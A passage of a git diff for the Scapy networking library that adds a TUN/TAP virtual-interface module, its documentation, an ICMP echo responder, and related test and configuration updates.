"darwin"* ] || [ "$TRAVIS_OS_NAME" = "osx" ] then OSTOX="osx" - UT_FLAGS+=" -K tcpdump" + # Travis CI in macOS 10.13+ can't load kexts. Need this for tuntaposx. + UT_FLAGS+=" -K tun -K tap" fi # pypy diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index 7c7202d32ad..8fb26b48a3b 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -2,6 +2,7 @@ aci ans archtypes ba +byteorder cace cas cros diff --git a/doc/scapy/layers/tuntap.rst b/doc/scapy/layers/tuntap.rst new file mode 100644 index 00000000000..5926af2ebe7 --- /dev/null +++ b/doc/scapy/layers/tuntap.rst @@ -0,0 +1,222 @@ +******************** +TUN / TAP Interfaces +******************** + +.. note:: + + This module only works on BSD, Linux and macOS. + +TUN/TAP lets you create virtual network interfaces from userspace. There are two +types of devices: + +TUN devices + Operates at Layer 3 (:py:class:`IP`), and is generally limited to one + protocol. + +TAP devices + Operates at Layer 2 (:py:class:`Ether`), and allows you to use any Layer 3 + protocol (:py:class:`IP`, :py:class:`IPv6`, IPX, etc.) + +Requirements +============ + +FreeBSD + Requires the ``if_tap`` and ``if_tun`` kernel modules. + + See `tap(4)`__ and `tun(4)`__ manual pages for more information. + +Linux + Load the ``tun`` kernel module: + + .. code-block:: console + + # modprobe tun + + ``udev`` normally handles the creation of device nodes. + + See `networking/tuntap.txt`__ in the Linux kernel documentation for more + information. + +macOS + On macOS 10.14 and earlier, you need to install `tuntaposx`__. macOS + 10.14.5 and later will warn about the ``tuntaposx`` kexts not being + `notarised`__, but this works because it was built before 2019-04-07. + + On macOS 10.15 and later, you need to use a `notarized build`__ of + ``tuntaposx``. `Tunnelblick`__ (OpenVPN client) contains a notarized build + of ``tuntaposx`` `which can be extracted`__. + + .. note:: + + On macOS 10.13 and later, you need to `explicitly approve loading + each third-party kext for the first time`__. + +__ https://www.freebsd.org/cgi/man.cgi?query=tap&sektion=4 +__ https://www.freebsd.org/cgi/man.cgi?query=tun&sektion=4 +__ https://www.kernel.org/doc/Documentation/networking/tuntap.txt +__ http://tuntaposx.sourceforge.net/ +__ https://developer.apple.com/documentation/security/notarizing_your_app_before_distribution?language=objc +__ https://developer.apple.com/documentation/security/notarizing_your_app_before_distribution?language=objc +__ https://tunnelblick.net/downloads.html +__ https://sourceforge.net/p/tuntaposx/bugs/28/#ac64 +__ https://developer.apple.com/library/archive/technotes/tn2459/_index.html + + +Using TUN/TAP in Scapy +====================== + +.. tip:: + + Using TUN/TAP generally requires running Scapy (and these utilities) as + ``root``. + +:py:class:`TunTapInterface` lets you easily create a new device: + +.. code-block:: pycon3 + + >>> t = TunTapInterface('tun0') + +You'll then need to bring the interface up, and assign an IP address in another +terminal. + +Because TUN is a layer 3 connection, it acts as a point-to-point link. We'll +assign these parameters: + +* local address (for your machine): 192.0.2.1 +* remote address (for Scapy): 192.0.2.2 + +On Linux, you would use: + +.. code-block:: shell + + sudo ip link set tun0 up + sudo ip addr add 192.0.2.1 peer 192.0.2.2 dev tun0 + +On BSD and macOS, use: + +.. code-block:: shell + + sudo ifconfig tun0 up + sudo ifconfig tun0 192.0.2.1 192.0.2.2 + +Now, nothing will happen when you ping those addresses -- you'll need to make +Scapy respond to that traffic. + +:py:class:`TunTapInterface` works the same as a :py:class:`SuperSocket`, so lets +setup an :py:class:`AnsweringMachine` to respond to :py:class:`ICMP` +``echo-request``: + +.. code-block:: pycon3 + + >>> am = t.am(ICMPEcho_am) + >>> am() + +Now, you can ping Scapy in another terminal: + +.. code-block: console: + + $ ping -c 3 192.0.2.2 + PING 192.0.2.2 (192.0.2.2): 56 data bytes + 64 bytes from 192.0.2.2: icmp_seq=0 ttl=64 time=2.414 ms + 64 bytes from 192.0.2.2: icmp_seq=1 ttl=64 time=3.927 ms + 64 bytes from 192.0.2.2: icmp_seq=2 ttl=64 time=5.740 ms + + --- 192.0.2.2 ping statistics --- + 3 packets transmitted, 3 packets received, 0.0% packet loss + round-trip min/avg/max/stddev = 2.414/4.027/5.740/1.360 ms + +You should see those packets show up in Scapy: + +.. code-block:: pycon3 + + >>> am() + Replying 192.0.2.1 to 192.0.2.2 + Replying 192.0.2.1 to 192.0.2.2 + Replying 192.0.2.1 to 192.0.2.2 + +You might have noticed that didn't configure Scapy with any IP address... and +there's a trick to this: :py:class:`ICMPEcho_am` swaps the ``source`` and +``destination`` fields of any :py:class:`Ether` and :py:class:`IP` headers on +the :py:class:`ICMP` packet that it receives. As a result, it actually responds +to *any* IP address. + +You can stop the :py:class:`ICMPEcho_am` AnsweringMachine with :kbd:`^C`. + +When you close Scapy, the ``tun0`` interface will automatically disappear. + +TunTapInterface reference +========================= + +.. py:class:: TunTapInterface(SimpleSocket) + + A socket to act as the remote side of a TUN/TAP interface. + + .. py:method:: __init__(iface: Text, [mode_tun], [strip_packet_info = True], [default_read_size = MTU]) + + :param Text iface: + The name of the interface to use, eg: ``tun0``. + + On BSD and macOS, this must start with either ``tun`` or ``tap``, + and have a corresponding :file:`/dev/` node (eg: :file:`/dev/tun0`). + + On Linux, this will be truncated to 16 bytes. + + :param bool mode_tun: + If True, create as TUN interface (layer 3). If False, creates a TAP + interface (layer 2). + + If not supplied, attempts to detect from the ``iface`` parameter. + + :param bool strip_packet_info: + If True (default), any :py:class:`TunPacketInfo` will be stripped + from the packet (so you get :py:class:`Ether` or :py:class:`IP`). + + Only Linux TUN interfaces have :py:class:`TunPacketInfo` available. + + This has no effect for interfaces that do not have + :py:class:`TunPacketInfo` available. + + :param int default_read_size: + Sets the default size that is read by + :py:meth:`SuperSocket.raw_recv` and :py:meth:`SuperSocket.recv`. + This defaults to :py:data:`scapy.data.MTU`. + + :py:class:`TunTapInterface` always adds overhead for + :py:class:`TunPacketInfo` headers, if required. + +.. py:class:: TunPacketInfo(Packet) + + Abstract class used to stack layer 3 protocols on a platform-specific + header. + + See :py:class:`LinuxTunPacketInfo` for an example. + + .. py:method:: guess_payload_class(payload) + + The default implementation expects the field ``proto`` to be declared, + with a value from :py:data:`scapy.data.ETHER_TYPES`. + +Linux-specific structures +------------------------- + +.. py:class:: LinuxTunPacketInfo(TunPacketInfo) + + Packet header used for Linux TUN packets. + + This is ``struct tun_pi``, declared in :file:`linux/if_tun.h`. + + .. py:attribute:: flags + + Flags to set on the packet. Only ``TUN_VNET_HDR`` is supported. + + .. py:attribute:: proto + + Layer 3 protocol number, per :py:data:`scapy.data.ETHER_TYPES`. + + Used by :py:meth:`TunTapPacketInfo.guess_payload_class`. + +.. py:class:: LinuxTunIfReq(Packet) + + Internal "packet" used for ``TUNSETIFF`` requests on Linux. + + This is ``struct ifreq``, declared in :file:`linux/if.h`. diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 9c00ef4fee7..229b139e5a6 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -34,9 +34,10 @@ class AnsweringMachine(six.with_metaclass(ReferenceAM, object)): function_name = "" filter = None sniff_options = {"store": 0} - sniff_options_list = ["store", "iface", "count", "promisc", "filter", "type", "prn", "stop_filter"] # noqa: E501 + sniff_options_list = ["store", "iface", "count", "promisc", "filter", + "type", "prn", "stop_filter", "opened_socket"] send_options = {"verbose": 0} - send_options_list = ["iface", "inter", "loop", "verbose"] + send_options_list = ["iface", "inter", "loop", "verbose", "socket"] send_function = staticmethod(send) def __init__(self, **kargs): diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index f1837c9d1bc..75ed4a8ade1 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -24,6 +24,7 @@ from scapy.interfaces import network_name from scapy.supersocket import SuperSocket from scapy.compat import raw +from scapy.layers.l2 import Loopback if FREEBSD: @@ -376,7 +377,18 @@ def send(self, pkt): self.assigned_interface = iff # Build the frame - frame = raw(self.guessed_cls() / pkt) + if self.guessed_cls == Loopback: + # bpf(4) man page (from macOS, but also for BSD): + # "A packet can be sent out on the network by writing to a bpf + # file descriptor. [...] Currently only writes to Ethernets and + # SLIP links are supported" + # + # Headers are only mentioned for reads, not writes. tuntaposx's tun + # device reports as a "loopback" device, but it does IP. + frame = raw(pkt) + else: + frame = raw(self.guessed_cls() / pkt) + pkt.sent_time = time.time() # Send the frame diff --git a/scapy/arch/common.py b/scapy/arch/common.py index 14d5e6b43a8..ee570f2f668 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -13,7 +13,7 @@ import time from scapy.consts import WINDOWS from scapy.config import conf -from scapy.data import MTU, ARPHRD_TO_DLT +from scapy.data import MTU, ARPHDR_ETHER, ARPHRD_TO_DLT from scapy.error import Scapy_Exception from scapy.interfaces import network_name @@ -131,6 +131,8 @@ def compile_filter(filter_exp, iface=None, linktype=None, except Exception: # Failed to use linktype: use the interface pass + if not linktype and conf.use_bpf: + linktype = ARPHDR_ETHER if linktype is not None: ret = pcap_compile_nopcap( MTU, linktype, ctypes.byref(bpf), bpf_filter, 0, -1 diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index a7293b6b94d..ef1e018b5c9 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -443,7 +443,8 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, log_runtime.info( "The 'monitor' argument has no effect on native linux sockets." ) - self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 + self.ins = socket.socket( + socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) if not nofilter: if conf.except_filter: if filter: diff --git a/scapy/config.py b/scapy/config.py index c8b2e5c8fd5..bf715d8a646 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -805,7 +805,7 @@ class Conf(ConfClass): 'llmnr', 'lltd', 'mgcp', 'mobileip', 'netbios', 'netflow', 'ntp', 'ppi', 'ppp', 'pptp', 'radius', 'rip', 'rtp', 'sctp', 'sixlowpan', 'skinny', 'smb', 'smb2', 'snmp', - 'tftp', 'vrrp', 'vxlan', 'x509', 'zigbee'] + 'tftp', 'tuntap', 'vrrp', 'vxlan', 'x509', 'zigbee'] #: a dict which can be used by contrib layers to store local #: configuration contribs = dict() # type: Dict[str, Any] diff --git a/scapy/consts.py b/scapy/consts.py index ebb1e160eaf..22529090f0c 100644 --- a/scapy/consts.py +++ b/scapy/consts.py @@ -7,7 +7,7 @@ This file contains constants """ -from sys import platform, maxsize +from sys import byteorder, platform, maxsize import platform as platform_lib LINUX = platform.startswith("linux") @@ -21,4 +21,5 @@ BSD = DARWIN or FREEBSD or OPENBSD or NETBSD # See https://docs.python.org/3/library/platform.html#cross-platform IS_64BITS = maxsize > 2**32 +BIG_ENDIAN = byteorder == 'big' # LOOPBACK_NAME moved to conf.loopback_name diff --git a/scapy/fields.py b/scapy/fields.py index a188f9ea6ed..76840eeb8ad 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2061,6 +2061,8 @@ def __init__(self, name, default, size, tot_size=0, end_tot_size=0): # type: (str, I, int, int, int) -> None Field.__init__(self, name, default) + if callable(size): + size = size(self) self.rev = size < 0 or tot_size < 0 or end_tot_size < 0 self.size = abs(size) if not tot_size: diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 9c8fdec060e..80aa961a024 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -19,6 +19,7 @@ from scapy.utils import checksum, do_graph, incremental_label, \ linehexdump, strxor, whois, colgen +from scapy.ansmachine import AnsweringMachine from scapy.base_classes import Gen, Net from scapy.data import ETH_P_IP, ETH_P_ALL, DLT_RAW, DLT_RAW_ALT, DLT_IPV4, \ IP_PROTOS, TCP_SERVICES, UDP_SERVICES @@ -2053,6 +2054,34 @@ def fragleak2(target, timeout=0.4, onlyasc=0, count=None): pass +class ICMPEcho_am(AnsweringMachine): + """Responds to ICMP Echo-Requests (ping)""" + function_name = "icmpechod" + + def is_request(self, req): + if req.haslayer(ICMP): + icmp_req = req.getlayer(ICMP) + if icmp_req.type == 8: # echo-request + return True + + return False + + def print_reply(self, req, reply): + print("Replying %s to %s" % (reply.getlayer(IP).dst, req.dst)) + + def make_reply(self, req): + reply = req.copy() + reply[ICMP].type = 0 # echo-reply + # Force re-generation of the checksum + reply[ICMP].chksum = None + if req.haslayer(IP): + reply[IP].src, reply[IP].dst = req[IP].dst, req[IP].src + reply[IP].chksum = None + if req.haslayer(Ether): + reply[Ether].src, reply[Ether].dst = req[Ether].dst, req[Ether].src + return reply + + conf.stats_classic_protocols += [TCP, UDP, ICMP] conf.stats_dot11_protocols += [TCP, UDP, ICMP] diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 43080e844a1..149781fa667 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -442,7 +442,7 @@ def answers(self, other): return self.payload.answers(other.payload) -class _IPv46(IP): +class IPv46(IP): """ This class implements a dispatcher that is used to detect the IP version while parsing Raw IP pcap files. @@ -4029,8 +4029,8 @@ def _load_dict(d): conf.l3types.register(ETH_P_IPV6, IPv6) conf.l2types.register(31, IPv6) conf.l2types.register(DLT_IPV6, IPv6) -conf.l2types.register(DLT_RAW, _IPv46) -conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46) +conf.l2types.register(DLT_RAW, IPv46) +conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46) bind_layers(Ether, IPv6, type=0x86dd) bind_layers(CookedLinux, IPv6, proto=0x86dd) diff --git a/scapy/layers/tuntap.py b/scapy/layers/tuntap.py new file mode 100644 index 00000000000..f45a7415ac1 --- /dev/null +++ b/scapy/layers/tuntap.py @@ -0,0 +1,238 @@ +# -*- mode: python3; indent-tabs-mode: nil; tab-width: 4 -*- +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Philippe Biondi +# Copyright (C) Michael Farrell +# This program is published under a GPLv2 license + +""" +Implementation of TUN/TAP interfaces. + +These allow Scapy to act as the remote side of a virtual network interface. +""" + +from __future__ import absolute_import + +import socket +import time +from fcntl import ioctl + +from scapy.compat import raw, bytes_encode +from scapy.config import conf +from scapy.consts import BIG_ENDIAN, BSD, LINUX +from scapy.data import ETHER_TYPES, MTU +from scapy.error import warning, log_runtime +from scapy.fields import Field, FlagsField, StrFixedLenField, XShortEnumField +from scapy.layers.inet import IP +from scapy.layers.inet6 import IPv46, IPv6 +from scapy.layers.l2 import Ether +from scapy.packet import Packet +from scapy.supersocket import SimpleSocket + +# Linux-specific defines (/usr/include/linux/if_tun.h) +LINUX_TUNSETIFF = 0x400454ca +LINUX_IFF_TUN = 0x0001 +LINUX_IFF_TAP = 0x0002 +LINUX_IFF_NO_PI = 0x1000 +LINUX_IFNAMSIZ = 16 + + +class NativeShortField(Field): + def __init__(self, name, default): + Field.__init__(self, name, default, "@H") + + +class TunPacketInfo(Packet): + aliastypes = [Ether] + + +class LinuxTunIfReq(Packet): + """ + Structure to request a specific device name for a tun/tap + Linux ``struct ifreq``. + + See linux/if.h (struct ifreq) and tuntap.txt for reference. + """ + fields_desc = [ + # union ifr_ifrn + StrFixedLenField("ifrn_name", b"", 16), + # union ifr_ifru + NativeShortField("ifru_flags", 0), + ] + + +class LinuxTunPacketInfo(TunPacketInfo): + """ + Base for TUN packets. + + See linux/if_tun.h (struct tun_pi) for reference. + """ + fields_desc = [ + # This is native byte order + FlagsField("flags", 0, + (lambda _: 16 if BIG_ENDIAN else -16), + ["TUN_VNET_HDR"] + + ["reserved%d" % x for x in range(1, 16)]), + # This is always network byte order + XShortEnumField("type", 0x9000, ETHER_TYPES), + ] + + +class TunTapInterface(SimpleSocket): + """ + A socket to act as the host's peer of a tun / tap interface. + + This implements kernel interfaces for tun and tap devices. + + :param iface: The name of the interface to use, eg: 'tun0' + :param mode_tun: If True, create as TUN interface (layer 3). + If False, creates a TAP interface (layer 2). + If not supplied, attempts to detect from the ``iface`` + name. + :type mode_tun: bool + :param strip_packet_info: If True (default), strips any TunPacketInfo from + the packet. If False, leaves it in tact. Some + operating systems and tunnel types don't include + this sort of data. + :type strip_packet_info: bool + + FreeBSD references: + + * tap(4): https://www.freebsd.org/cgi/man.cgi?query=tap&sektion=4 + * tun(4): https://www.freebsd.org/cgi/man.cgi?query=tun&sektion=4 + + Linux references: + + * https://www.kernel.org/doc/Documentation/networking/tuntap.txt + + """ + desc = "Act as the host's peer of a tun / tap interface" + + def __init__(self, iface=None, mode_tun=None, default_read_size=MTU, + strip_packet_info=True, *args, **kwargs): + self.iface = bytes_encode(conf.iface if iface is None else iface) + + self.mode_tun = mode_tun + if self.mode_tun is None: + if self.iface.startswith(b"tun"): + self.mode_tun = True + elif self.iface.startswith(b"tap"): + self.mode_tun = False + else: + raise ValueError( + "Could not determine interface type for %r; set " + "`mode_tun` explicitly." % (self.iface,)) + + self.strip_packet_info = bool(strip_packet_info) + + # This is non-zero when there is some kernel-specific packet info. + # We add this to any MTU value passed to recv(), and use it to + # remove leading bytes when strip_packet_info=True. + self.mtu_overhead = 0 + + # The TUN packet specification sends raw IP at us, and doesn't specify + # which version. + self.kernel_packet_class = IPv46 if self.mode_tun else Ether + + if LINUX: + devname = b"/dev/net/tun" + + # Having an EtherType always helps on Linux, then we don't need + # to use auto-detection of IP version. + if self.mode_tun: + self.kernel_packet_class = LinuxTunPacketInfo + self.mtu_overhead = 4 # len(LinuxTunPacketInfo) + else: + warning("tap devices on Linux do not include packet info!") + self.strip_packet_info = True + + if len(self.iface) > LINUX_IFNAMSIZ: + warning("Linux interface names are limited to %d bytes, " + "truncating!" % (LINUX_IFNAMSIZ,)) + self.iface = self.iface[:LINUX_IFNAMSIZ] + + elif BSD: # also DARWIN + if not (self.iface.startswith(b"tap") or + self.iface.startswith(b"tun")): + raise ValueError("Interface names must start with `tun` or " + "`tap` on BSD and Darwin") + devname = b"/dev/" + self.iface + if not self.strip_packet_info: + warning("tun/tap devices on BSD and Darwin never include " + "packet info!") + self.strip_packet_info = True + else: + raise NotImplementedError("TunTapInterface is not supported on " + "this platform!") + + sock = open(devname, "r+b", buffering=0) + + if LINUX: + if self.mode_tun: + flags = LINUX_IFF_TUN + else: + # Linux can send us LinuxTunPacketInfo for TAP interfaces, but + # the kernel sends the wrong information! + # + # Instead of type=1 (Ether), it sends that of the payload + # (eg: 0x800 for IPv4 or 0x86dd for IPv6). + # + # tap interfaces always send Ether frames, which include a + # type parameter for the IPv4/v6/etc. payload, so we set + # IFF_NO_PI. + flags = LINUX_IFF_TAP | LINUX_IFF_NO_PI + + tsetiff = raw(LinuxTunIfReq( + ifrn_name=bytes_encode(self.iface), + ifru_flags=flags)) + + ioctl(sock, LINUX_TUNSETIFF, tsetiff) + + self.closed = False + self.default_read_size = default_read_size + super(TunTapInterface, self).__init__(sock) + + def __call__(self, *arg, **karg): + """Needed when using an instantiated TunTapInterface object for + conf.L2listen, conf.L2socket or conf.L3socket. + + """ + return self + + def recv_raw(self, x=None): + if x is None: + x = self.default_read_size + + x += self.mtu_overhead + + r = self.kernel_packet_class, self.ins.read(x), time.time() + if self.mtu_overhead > 0 and self.strip_packet_info: + # Get the packed class of the payload, without triggering a full + # decode of the payload data. + cls = r[0](r[1][:self.mtu_overhead]).guess_payload_class(b'') + + # Return the payload data only + return cls, r[1][self.mtu_overhead:], r[2] + else: + return r + + def send(self, x): + if hasattr(x, "sent_time"): + x.sent_time = time.time() + + if self.kernel_packet_class == IPv46: + # IPv46 is an auto-detection wrapper; we should just push through + # packets normally if we got IP or IPv6. + if not isinstance(x, (IP, IPv6)): + x = IP() / x + elif not isinstance(x, self.kernel_packet_class): + x = self.kernel_packet_class() / x + + sx = raw(x) + + try: + self.outs.write(sx) + self.outs.flush() + except socket.error: + log_runtime.error("%s send", + self.__class__.__name__, exc_info=True) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 3b8f52f9db9..9c3d9b276a0 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1120,11 +1120,11 @@ def prn_send(pkt): return else: if newpkt is True: - newpkt = pkt.original + newpkt = pkt elif not newpkt: return else: - newpkt = pkt.original + newpkt = pkt try: sendsock.send(newpkt) except Exception: diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 177b6563bd5..a65477dd047 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -11,15 +11,14 @@ from select import select, error as select_error import ctypes import errno -import os import socket import struct import time from scapy.config import conf -from scapy.consts import LINUX, DARWIN, WINDOWS +from scapy.consts import DARWIN, WINDOWS from scapy.data import MTU, ETH_P_IP, SOL_PACKET, SO_TIMESTAMPNS -from scapy.compat import raw, bytes_encode +from scapy.compat import raw from scapy.error import warning, log_runtime from scapy.interfaces import network_name import scapy.modules.six as six @@ -185,6 +184,14 @@ def tshark(self, *args, **kargs): from scapy import sendrecv return sendrecv.tshark(opened_socket=self, *args, **kargs) + def am(self, cls, *args, **kwargs): + """ + Creates an AnsweringMachine associated with this socket. + + :param cls: A subclass of AnsweringMachine to instantiate + """ + return cls(*args, opened_socket=self, socket=self, **kwargs) + @staticmethod def select(sockets, remain=conf.recv_poll_rate): """This function is called during sendrecv() routine to select @@ -391,74 +398,3 @@ def select(sockets, remain=None): if (WINDOWS or DARWIN): return sockets, None return SuperSocket.select(sockets, remain=remain) - - -class TunTapInterface(SuperSocket): - """A socket to act as the host's peer of a tun / tap interface. - - """ - desc = "Act as the host's peer of a tun / tap interface" - - def __init__(self, iface=None, mode_tun=None, *arg, **karg): - self.iface = conf.iface if iface is None else iface - self.mode_tun = ("tun" in self.iface) if mode_tun is None else mode_tun - self.closed = True - self.open() - - def open(self): - """Open the TUN or TAP device.""" - if not self.closed: - return - self.outs = self.ins = open( - "/dev/net/tun" if LINUX else ("/dev/%s" % self.iface), "r+b", - buffering=0 - ) - if LINUX: - from fcntl import ioctl - # TUNSETIFF = 0x400454ca - # IFF_TUN = 0x0001 - # IFF_TAP = 0x0002 - # IFF_NO_PI = 0x1000 - ioctl(self.ins, 0x400454ca, struct.pack( - "16sH", bytes_encode(self.iface), - 0x0001 if self.mode_tun else 0x1002, - )) - self.closed = False - - def __call__(self, *arg, **karg): - """Needed when using an instantiated TunTapInterface object for -conf.L2listen, conf.L2socket or conf.L3socket. - - """ - return self - - def recv(self, x=MTU): - if self.mode_tun: - data = os.read(self.ins.fileno(), x + 4) - proto = struct.unpack('!H', data[2:4])[0] - return conf.l3types.get(proto, conf.raw_layer)(data[4:]) - return conf.l2types.get(1, conf.raw_layer)( - os.read(self.ins.fileno(), x) - ) - - def send(self, x): - sx = raw(x) - if self.mode_tun: - try: - proto = conf.l3types[type(x)] - except KeyError: - log_runtime.warning( - "Cannot find layer 3 protocol value to send %s in " - "conf.l3types, using 0", - x.name if hasattr(x, "name") else type(x).__name__ - ) - proto = 0 - sx = struct.pack('!HH', 0, proto) + sx - try: - try: - x.sent_time = time.time() - except AttributeError: - pass - return os.write(self.outs.fileno(), sx) - except socket.error: - log_runtime.error("%s send", self.__class__.__name__, exc_info=True) # noqa: E501 diff --git a/test/configs/solaris.utsc b/test/configs/solaris.utsc index e6642f4222e..a508990b2ad 100644 --- a/test/configs/solaris.utsc +++ b/test/configs/solaris.utsc @@ -30,6 +30,8 @@ "windows", "crypto_advanced", "ipv6", + "tap", + "tun", "vcan_socket" ] } diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 7b233d1fdb9..1d2507c5389 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -22,15 +22,17 @@ "test\\tls*.uts": "load_layer(\"tls\")" }, "kw_ko": [ - "osx", - "linux", + "brotli", "crypto_advanced", + "ipv6", + "linux", "mock_read_routes_bsd", - "require_gui", "open_ssl_client", + "osx", + "require_gui", + "tap", + "tun", "vcan_socket", - "ipv6", - "brotli", "zstd" ] } diff --git a/test/configs/windows2.utsc b/test/configs/windows2.utsc new file mode 100644 index 00000000000..1435cd8047a --- /dev/null +++ b/test/configs/windows2.utsc @@ -0,0 +1,40 @@ +{ + "testfiles": [ + "*.uts", + "scapy\\layers\\*.uts", + "test\\contrib\\automotive\\obd\\*.uts", + "test\\contrib\\automotive\\gm\\*.uts", + "test\\contrib\\automotive\\bmw\\*.uts", + "test\\contrib\\automotive\\*.uts", + "tls\\tests_tls_netaccess.uts", + "contrib\\*.uts" + ], + "remove_testfiles": [ + "bpf.uts", + "linux.uts" + ], + "breakfailed": true, + "onlyfailed": true, + "preexec": { + "contrib\\*.uts": "load_contrib(\"%name%\")", + "cert.uts": "load_layer(\"tls\")", + "sslv2.uts": "load_layer(\"tls\")", + "tls*.uts": "load_layer(\"tls\")" + }, + "format": "html", + "kw_ko": [ + "osx", + "linux", + "crypto_advanced", + "mock_read_routes_bsd", + "appveyor_only", + "open_ssl_client", + "vcan_socket", + "ipv6", + "manufdb", + "tcpdump", + "tap", + "tun", + "tshark" + ] +} diff --git a/test/linux.uts b/test/linux.uts index fabfde913a1..86e015ae09f 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -358,3 +358,9 @@ t_sniffer.join(1) assert(dot1q_count == 2) veth.destroy() + += Reload interfaces & routes + +conf.ifaces.reload() +conf.route.resync() +conf.route6.resync() diff --git a/test/sendsniff.uts b/test/sendsniff.uts index 633242717f5..f7ebb1428eb 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -6,7 +6,7 @@ ############ + Test bridge_and_sniff() using tap sockets -~ tap linux +~ tap = Create two tap interfaces @@ -23,44 +23,46 @@ else: assert subprocess.check_call(["ifconfig", "tap%d" % i, "up"]) == 0 = Run a sniff thread on the tap1 **interface** -* It will terminate when 5 IP packets from 1.2.3.4 have been sniffed +* It will terminate when 5 IP packets from 192.0.2.1 have been sniffed t_sniff = Thread( target=sniff, kwargs={"iface": "tap1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "1.2.3.4"} + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"} ) t_sniff.start() = Run a bridge_and_sniff thread between the taps **sockets** -* It will terminate when 5 IP packets from 1.2.3.4 have been forwarded +* It will terminate when 5 IP packets from 192.0.2.1 have been forwarded t_bridge = Thread(target=bridge_and_sniff, args=(tap0, tap1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "1.2.3.4"}) + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}) t_bridge.start() -= Send five IP packets from 1.2.3.4 to the tap0 **interface** += Send five IP packets from 192.0.2.1 to the tap0 **interface** time.sleep(1) -sendp([Ether(dst=ETHER_BROADCAST) / IP(src="1.2.3.4") / ICMP()], iface="tap0", +sendp([Ether(dst=ETHER_BROADCAST) / IP(src="192.0.2.1") / ICMP()], iface="tap0", count=5) = Wait for the threads -t_bridge.join() -t_sniff.join() +t_bridge.join(5) +t_sniff.join(5) +assert not t_bridge.is_alive() +assert not t_sniff.is_alive() = Run a sniff thread on the tap1 **interface** -* It will terminate when 5 IP packets from 2.3.4.5 have been sniffed +* It will terminate when 5 IP packets from 198.51.100.1 have been sniffed t_sniff = Thread( target=sniff, kwargs={"iface": "tap1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == "2.3.4.5"} + "lfilter": lambda p: IP in p and p[IP].src == "198.51.100.1"} ) t_sniff.start() = Run a bridge_and_sniff thread between the taps **sockets** -* It will "NAT" packets from 1.2.3.4 to 2.3.4.5 and will terminate when 5 IP packets have been forwarded +* It will "NAT" packets from 192.0.2.1 to 198.51.100.1 and will terminate when 5 IP packets have been forwarded def nat_1_2(pkt): - if IP in pkt and pkt[IP].src == "1.2.3.4": - pkt[IP].src = "2.3.4.5" + if IP in pkt and pkt[IP].src == "192.0.2.1": + pkt[IP].src = "198.51.100.1" del pkt[IP].chksum return pkt return False @@ -68,17 +70,19 @@ def nat_1_2(pkt): t_bridge = Thread(target=bridge_and_sniff, args=(tap0, tap1), kwargs={"store": False, "count": 5, 'prn': Packet.summary, "xfrm12": nat_1_2, - "lfilter": lambda p: IP in p and p[IP].src == "1.2.3.4"}) + "lfilter": lambda p: IP in p and p[IP].src == "192.0.2.1"}) t_bridge.start() -= Send five IP packets from 1.2.3.4 to the tap0 **interface** += Send five IP packets from 192.0.2.1 to the tap0 **interface** time.sleep(1) -sendp([Ether(dst=ETHER_BROADCAST) / IP(src="1.2.3.4") / ICMP()], iface="tap0", +sendp([Ether(dst=ETHER_BROADCAST) / IP(src="192.0.2.1") / ICMP()], iface="tap0", count=5) = Wait for the threads -t_bridge.join() -t_sniff.join() +t_bridge.join(5) +t_sniff.join(5) +assert not t_bridge.is_alive() +assert not t_sniff.is_alive() = Delete the tap interfaces if conf.use_pypy: @@ -93,7 +97,7 @@ else: ############ + Test bridge_and_sniff() using tun sockets -~ tun linux not_pcapdnet +~ tun not_pcapdnet = Create two tun interfaces @@ -105,51 +109,61 @@ tun0, tun1 = [TunTapInterface("tun%d" % i) for i in range(2)] if LINUX: for i in range(2): assert subprocess.check_call(["ip", "link", "set", "tun%d" % i, "up"]) == 0 + assert subprocess.check_call([ + "ip", "addr", "change", + "192.0.2.1", "peer", "192.0.2.2", "dev", "tun0"]) == 0 else: for i in range(2): assert subprocess.check_call(["ifconfig", "tun%d" % i, "up"]) == 0 + assert subprocess.check_call(["ifconfig", "tun0", "192.0.2.1", "192.0.2.2"]) == 0 + +print('waiting a bit...') +import time +time.sleep(10) = Run a sniff thread on the tun1 **interface** -* It will terminate when 5 IP packets from 1.2.3.4 have been sniffed +* It will terminate when 5 IP packets from 192.0.2.1 have been sniffed t_sniff = Thread( target=sniff, kwargs={"iface": "tun1", "count": 5, "prn": Packet.summary, - "lfilter": lambda p: IP in p and p[IP].src == 